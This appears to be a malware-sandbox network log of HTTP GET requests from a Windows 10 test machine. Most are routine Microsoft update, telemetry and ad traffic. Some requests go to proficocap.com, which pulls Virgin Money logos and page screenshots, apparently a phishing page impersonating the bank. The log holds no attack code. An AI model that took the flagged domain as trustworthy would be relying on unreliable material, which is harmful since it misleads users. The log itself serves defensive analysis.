    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/608171432:1733530697:8BWsYhk1SWZlRP7GpYN7tPMosN7A_9EHlf49BfqZObo/8eef4911a8e143cb/MZci78iv2CCudpo2.FGQ5mZ5Rf0uaBDJlbj5xATahfU-1733687437-1.1.1.1-orHo8b5s0mjHvI02qYmgkSKS324gw5u9MJx4_q2_vPNFnQ_SCLfrUsZYIz4F5ypF HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/608171432:1733530697:8BWsYhk1SWZlRP7GpYN7tPMosN7A_9EHlf49BfqZObo/8eef4911a8e143cb/MZci78iv2CCudpo2.FGQ5mZ5Rf0uaBDJlbj5xATahfU-1733687437-1.1.1.1-orHo8b5s0mjHvI02qYmgkSKS324gw5u9MJx4_q2_vPNFnQ_SCLfrUsZYIz4F5ypF HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=1pHf3xNPNeTPsur&MD=9ymk1AwG HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
    Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/2103902929:1733530456:gWlw6UrWrF1EVwazpOoHDdN2NPkECb29gam9UES4p7M/8eef48dc28b04405/Lyh2pldR2U_E_.MUR82KipgfyzNT77WVEZwHtUhweWU-1733687428-1.2.1.1-G7.NbYDLguhv11ABpOVb3tBc0A56ETChg8iDEU7elt4XUzrkd1lpQ9Ezh8w9c7jA HTTP/1.1Host: proficocap.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338387&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:EFC142BC-E096-E7E8-870F-847592C54827&ctry=CH&time=20241208T195059Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=ea8f1d3c-7aea-46a0-a8e3-7bea5600caa3&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=410296d8f45241248f8af4ebf49f1589&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=622562&metered=false&nettype=ethernet&npid=sc-338387&oemName=vokhby%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&sc-mode=0&scmid=Public&smBiosDm=vokhby20%2C1&stabedgever=117.0.2045.47&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696408997&tl=2&tsu=622562&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=25341&sc=6Cache-Control: no-cacheMS-CV: wzBVV2vmh0SIF2RY.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338389&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:EFC142BC-E096-E7E8-870F-847592C54827&ctry=CH&time=20241208T195059Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=ea8f1d3c-7aea-46a0-a8e3-7bea5600caa3&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=b45a07db854d4ce4ab0996c84a8542f4&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&currsel=137271744000000000&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=622562&metered=false&nettype=ethernet&npid=sc-338389&oemName=vokhby%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=vokhby20%2C1&stabedgever=117.0.2045.47&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696408997&tl=2&tsu=622562&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: cid=128000000001627409&chs=0&imp=0&chf=0&ds=50543&fs=25341&sc=6Cache-Control: no-cacheMS-CV: wzBVV2vmh0SIF2RY.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=280815&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:EFC142BC-E096-E7E8-870F-847592C54827&ctry=CH&time=20241208T195059Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=ea8f1d3c-7aea-46a0-a8e3-7bea5600caa3&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=6fb4669775c848c7a1ddcc46d594281c&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&currsel=137271744000000000&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=622562&metered=false&nettype=ethernet&npid=sc-280815&oemName=vokhby%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=vokhby20%2C1&stabedgever=117.0.2045.47&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696408997&tl=2&tsu=622562&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: cid=128000000001627409&chs=0&imp=0&chf=0&ds=50543&fs=25341&sc=6Cache-Control: no-cacheMS-CV: wzBVV2vmh0SIF2RY.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=310091&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:EFC142BC-E096-E7E8-870F-847592C54827&ctry=CH&time=20241208T195059Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=ea8f1d3c-7aea-46a0-a8e3-7bea5600caa3&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=58bcc9d045d342f6863c7bd98bddef6e&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&currsel=133409815784023643&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=622562&metered=false&nettype=ethernet&npid=sc-310091&oemName=vokhby%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&scmid=Public&smBiosDm=vokhby20%2C1&stabedgever=117.0.2045.47&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696408997&tl=2&tsu=622562&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=25341&sc=6Cache-Control: no-cacheMS-CV: wzBVV2vmh0SIF2RY.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://proficocap.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239399109665_1344PV668L57B53FJ&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239399109664_12R6JVR4SJZQSTHCV&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239402414374_1RZXN1BFTHNSAZBQY&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239402414375_1AVQBVS8V3X3ACPMA&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239385875217_1AS9NW8J4VEXSVA8E&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /virginmoney.com HTTP/1.1Host: logo.clearbit.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://proficocap.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /get/http://www.virginmoney.com HTTP/1.1Host: image.thum.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://proficocap.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239385875220_1FZJ7DDRUSKY0IVFA&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /virginmoney.com HTTP/1.1Host: logo.clearbit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
